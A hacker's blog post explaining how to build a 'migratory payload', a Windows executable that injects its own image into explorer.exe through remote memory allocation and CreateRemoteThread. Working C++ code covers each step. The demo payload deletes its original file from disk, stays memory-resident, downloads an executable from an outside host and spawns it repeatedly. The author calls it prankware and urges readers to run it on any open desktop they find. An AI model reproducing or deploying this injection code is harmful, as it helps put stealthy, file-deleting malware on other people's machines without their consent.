Hi. I’m procrastinating again, but this time it’s related to the project I’m procrastinating. And according to a well respected hacker, this is a functional way to be productive. So you, the reader, benefit from everything. Besides, the deadline for the Phrack CFP isn’t for another few months, so I’ve got time. (Famous last words.)

First of all, what the hell do I mean by migratory payload? That’s not a term in MITRE ATT&CK! In more technical terms, when I say “migratory payload,” I am referring to executables that can otherwise occupy the space of another executable after existing and operating in another state. Think of an executable that runs away from your mouse and injects itself into explorer.exe after you double-click it. It relies ultimately on process injection, which is a slightly different but similar technique to DLL injection. MITRE can be fun to rag on but they host a useful technical compendium.

So why did I make up the term “migratory payload,” and what does it do? It sounds neat and it does what it says on the tin: migrates from executable to executable via whatever method of memory injection deemed necessary. Here’s an executive summary of what a migratory payload would do:

  • Start (as you do)
  • Allocate memory in another process
  • Write executable to allocated memory
  • Spawn thread that loads and runs the executable image in the target process
  • Delete original process
  • Party in the target executable

But is this just a party trick? Kind of, but it’s useful– once you’re in the memory of a trusted process like explorer.exe it can be difficult to extract you without being aware explorer.exe is infected. Interestingly, there’s honestly not a lot to writing a migratory payload– there’s just a lot of moving pieces to be aware of to effectively write up the program.

Let’s talk about how to write an effective payload of this variety!

Don’t Sweat the Techniques

I have practically spammed this article I wrote talking about how to load a PE file manually. You’re gonna wanna read it again if you’re not familiar with the process already– we need it to load our PE file once it’s injected into the target process. Depending on which process we’re migrating to, we might want a different function to call to load our binary. Despite being remote to the target process, we don’t need to rely on __declspec(dllexport) entries to call target functions! We can simply calculate the RVA of the function we wish to call to get the address of the function as it exists in the remote process and call CreateRemoteThread.

If you’re familiar with how modern programs in MSVC compile down to code, you know about the C runtime. If you’re not familiar, the C and C++ runtime are the boilerplate code that gets included in your program which defines the functionality of the various entrypoints within the Windows code. It is what drives the functionality behind the difference between main and WinMain. It’s the reason for the separate /MD and /MT compiler switches. Because /MD requires a build-specific MSVC DLL for the resulting binary and /MT requires runtime resolution prior to the call to main regardless if it’s a DLL or EXE entrypoint, we need to be aware of this when initializing our binary in another process. You might be tempted to say fuck it and issue the /NODEFAULTLIB command switch for maximum flexibility, which ultimately wipes out the C runtime preamble, but unless you’re prepared for the painful hell that is lacking a C runtime, you don’t want to do that.

Let’s talk about entrypoints for a second. Depending on whether your binary is configured to be a DLL or an EXE, you get wildly different entrypoints. For DLLs, you have the following entrypoint:

BOOL WINAPI DllMain(HINSTANCE dll_instance, DWORD reason, LPVOID reserved)

This is not just the C runtime entrypoint either– when a file is loaded by the Windows loader as a DLL, AddressOfEntryPoint has that header. For executables, though, the entrypoint isn’t like the C runtime entrypoint for main at all. The executable entrypoint, we’ll call it start, is very simple:

int start(void)

This is from the deep lore that is the Windows loader.

Because a DLL by design separates functions (exports) from loaders (DllMain), it is clearly the superior configuration for this sort of setup, due to needing to deal with the C runtime preamble in some way or another. This is why DLL injection reigns supreme– it is an easily shimmable piece of code which has clearly delineated functionality versus loading. But DLLs are hard to deploy functionally without some sort of corresponding executable piece. A DLL needs a trigger after all. So let’s make an executable with a multipurpose main routine!

The main routine for the C runtime comes with a quirk: when you return from main, ExitProcess is eventually called. This is problematic if we’re going to invade the space of a permanently-running executable like explorer.exe with CreateRemoteThread! We can create an atexit routine that, instead of calling ExitProcess, calls ExitThread (documentation here). And since we have control over the allocated memory of the module when it migrates to another executable’s space, we can use arbitrary thread functions to instrument the pre-load state of the binary as it migrates.

The superiority of the DLL approach also rears its ugly head here– we need a fresh image to inject into our target program! Interestingly, however, it’s also its Achilles’ heel– what makes the DLL superior is that it can rapidly launch from disk into a target process with easily supported mechanisms like LoadLibraryA coupled with CreateRemoteThread. See, the DLL is being converted from a disk image to a memory image, and it achieves this by existing on disk to begin with. What if, when we stopped existing on disk, and we’ve infested another process, we wanted to infest another process? Well, we would need to preserve the image in its pre-load state, which is typically its disk image state. Since the goal here is to exist outside the system’s disk as much as possible, we can be rather fluid as to what we want the prior state to be in, but we’ll be lazy and just stick with the disk image as a base state for now.

That’s a lot of fucking words without a break and I’m sorry, but I’m trying to set the scene here. Let’s break down what we need as a base state for the migratory payload:

  • a main routine with some sort of multi-entrant state (since we’re calling it for the C runtime)
  • the migration fork in the main routine which sets ExitThread atexit hooks
  • a loader thread which loads the image and sets the target state
  • a fresh copy of the memory image prior to the calling of the entrypoint for fresh migration

That’s enough theory, let’s let the rubber hit the pavement and get an implementation going.

Applying the Techniques

First of all, fuck main for this purpose. main in the C runtime triggers spawning a console window. Do you really want to spawn a new console window with every infection? “Maybe I want to debug it,” you might be thinking. Sure, if that’s your style of debugging, I’m not going to knock it. I’m not going to throw stones– printf debugging is an age-old technique and I’m guilty of it sometimes too. No, we want good old WinMain for this, documentation here.

int WinMain(HINSTANCE instance, HINSTANCE prev_instance, LPSTR command_line, int show_command)

Secondly, we want a fresh image for migration purposes! How do we get that? Our executable is at its freshest just before the first entrypoint, which is not WinMain but a TLS callback. So we create a TLS callback which parses our executable’s PE header to get the size of the image and copy a fresh image for later manipulation.

VOID WINAPI get_fresh_image(PVOID instance, DWORD reason, PVOID reserved) {
   if (reason != DLL_PROCESS_ATTACH)
      return;

   std::uint8_t *self_u8 = (std::uint8_t *)instance;
   PIMAGE_NT_HEADERS64 nt_headers = get_nt_headers(self_u8);
   FRESH_IMAGE = (std::uint8_t *)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, nt_headers->OptionalHeader.SizeOfImage);
   std::memcpy(FRESH_IMAGE, self_u8, nt_headers->OptionalHeader.SizeOfImage);
}

#pragma comment(linker, "/INCLUDE:_tls_used")
#pragma comment(linker, "/INCLUDE:tls_callback")
#pragma const_seg(push)
#pragma const_seg(".CRT$XLAAA")
extern "C" const PIMAGE_TLS_CALLBACK tls_callback = get_fresh_image;
#pragma const_seg(pop)

We specifically call HeapAlloc and not std::malloc because std::malloc requires the C runtime to be initialized, which occurs when the main entrypoint is called, and our TLS callback is specifically intended to be run before that. If you really wanted to, you could call VirtualAlloc but since the image is going to be externally executed in a remote buffer it seems a little overkill.

Because we might want our loader to rely on data and code relocated by the relocation directory, we separate relocating the binary from the loader, and perform the relocation on the binary before it’s written to the process space of the target binary we want to migrate to.

You might also be painfully aware of another bottleneck: a single argument being passed to our loader and other target functions, since we’re relying on CreateRemoteThread. The worst part is that we can’t successfully pass anything that relies on pointers via CreateRemoteThread– we would need to deep copy and transfer the data we need via VirtualAllocEx and WriteProcessMemory to the target process, then pass that pointer to CreateRemoteThread as the thread’s argument. Clunky, but it works.

Spamming you with this how-to again, because now’s the time in the article where we talk about writing the loader. On top of needing to prepare the image for execution as if we’re calling LoadLibrary, we need to alter the new main state of the migrated binary so that our WinMain routine changes routes. Once we’ve changed the state with the loader routine, we can write our configuration data to the process and re-execute WinMain with our altered state.

Now it’s time to use the loader. We need to open our target process for manipulation and injection. Once we’ve found our target process– I have chosen to call EnumProcesses to find explorer.exe– we can attempt to acquire a process handle in the following way.

      /* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
      HANDLE explorer_proc = OpenProcess(PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
      assert(explorer_proc != nullptr);

From here, we can create a copy of our fresh image and write it into our target process’s memory space.

      /* allocate space for our executable */
      std::uint8_t *self_u8 = (std::uint8_t *)GetModuleHandleA(nullptr);
      PIMAGE_NT_HEADERS64 self_nt = get_nt_headers(self_u8);
      std::uintptr_t explorer_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, self_nt->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
      assert(explorer_base != 0);
      
      /* copy the executable in memory and relocate it to the allocated base */
      std::uint8_t *copy_u8 = (std::uint8_t *)std::malloc(self_nt->OptionalHeader.SizeOfImage);
      std::memcpy(copy_u8, FRESH_IMAGE, self_nt->OptionalHeader.SizeOfImage);
      relocate_image(copy_u8, (std::uintptr_t)self_u8, explorer_base);
      
      /* write the relocated executable to the process's allocation with WriteProcessMemory */
      SIZE_T bytes_written;
      assert(WriteProcessMemory(explorer_proc, (LPVOID)explorer_base, copy_u8, self_nt->OptionalHeader.SizeOfImage, &bytes_written));

We then create the configuration needed for our migrated binary, copy it into the memory of our target executable, then create a thread for our loader via calculating our loader function’s RVA and executing it with the configuration pointer.

      std::uintptr_t config_base = (std::uintptr_t)VirtualAllocEx(explorer_proc, nullptr, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
      assert(config_base != 0);

      SheepConfig explorer_config;
      std::memset(&explorer_config, 0, sizeof(SheepConfig));
      explorer_config.image_base = explorer_base;
      explorer_config.state = MonitorState::STATE_MONITOR;
      explorer_config.launcher_pid = GetCurrentProcessId();
      explorer_config.max_sheep = 10;
      GetModuleFileName(nullptr, &explorer_config.launcher_file[0], MAX_PATH);

      assert(WriteProcessMemory(explorer_proc, (LPVOID)config_base, &explorer_config, sizeof(SheepConfig), &bytes_written));
      
      /* get the rva of the loader and call it with CreateRemoteThread */
      DWORD loader_rva = VA_TO_RVA(self_u8, load_image);
      DWORD loader_id;
      HANDLE loader_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+loader_rva), (LPVOID)config_base, 0, &loader_id);
      assert(loader_handle != nullptr);
      
      /* wait for the thread to finish */
      WaitForSingleObject(loader_handle, INFINITE);

Finally, all that’s left to do is re-execute WinMain in the target process.

      /* get the rva of the target routine and call it with CreateRemoteThread */
      DWORD main_id;
      HANDLE main_handle = CreateRemoteThread(explorer_proc, nullptr, 8192, (LPTHREAD_START_ROUTINE)(explorer_base+self_nt->OptionalHeader.AddressOfEntryPoint), nullptr, 0, &main_id);
      assert(main_handle != nullptr);

Demo Payload: Sheep Monitor

Let’s talk about the demo payload for a moment. I am a particular fan of the classic eSheep program and if you’ve been paying attention you’ve noticed me using it a lot in the preceding blogs. This demo payload is no different. One of the things I wanted this demo payload to do was demonstrate being aggressively memory-resident, and recreating the classic “delete yourself” technique in this part of the payload. So in the opening routine of our payload, we have the following code.

    case MonitorState::STATE_MONITOR: {
      atexit(exit_thread);

      DWORD exit_code = STILL_ACTIVE;
      
      do {
         HANDLE proc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, GLOBAL_CONFIG->launcher_pid);

         // if it results in a null handle, the process is probably dead
         if (proc == nullptr)
            break;

         GetExitCodeProcess(proc, &exit_code);
         Sleep(1000);
      } while (exit_code == STILL_ACTIVE);

Here, we open the original launcher process ID and sit on it until it stops running. Then, we wait until the file is deleted from disk before continuing.

      /* we could get fancy and persist in the registry if we so wanted to right here,
       * but for demo purposes we simply delete the original file */
      while (!DeleteFile(GLOBAL_CONFIG->launcher_file)) {
         DWORD error = GetLastError();

         if (error == ERROR_FILE_NOT_FOUND)
            break;
         
         Sleep(1000);
      }

We are now ready to enter our main process loop. Functionally, it’s pretty simple.

  • Create a pool of processes
  • If the sheep program isn’t present, download it
  • If the pool isn’t at the limit, spawn a new sheep while clearing inactive sheep
  • If the pool is full, every sheep plays Russian Roulette to thin out the herd
  • Sleep for 60 seconds and do it all again
      std::vector<PROCESS_INFORMATION> sheep_pool;

      while (GetFileAttributes("C:\\ProgramData\\sheep.exe") != INVALID_FILE_ATTRIBUTES || download_url(L"amethyst.systems", L"/sheep.exe", "C:\\ProgramData\\sheep.exe")) {
         if (sheep_pool.size() > 0)
            while (clear_inactive_sheep(sheep_pool));

         if (sheep_pool.size() < GLOBAL_CONFIG->max_sheep) {
            PROCESS_INFORMATION new_sheep;
            
            if (spawn_sheep(&new_sheep))
               sheep_pool.push_back(new_sheep);
         }
         else
            russian_roulette(sheep_pool);

         Sleep(60000);
      }

This payload could be considered functional prankware. Feel free to run it on any open desktop you find! It’s memory-resident and disappears either when explorer.exe crashes (though not as a result of us) or when the user reboots.

Merry Christmas and happy hacking!